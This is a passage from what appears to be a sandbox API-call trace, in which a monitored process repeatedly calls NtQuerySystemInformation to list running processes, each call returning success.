SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0091.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11580) returned 0x0 [0091.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11540) returned 0x0 [0091.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11600) returned 0x0 [0091.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0091.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x11708) returned 0x0 [0092.004] 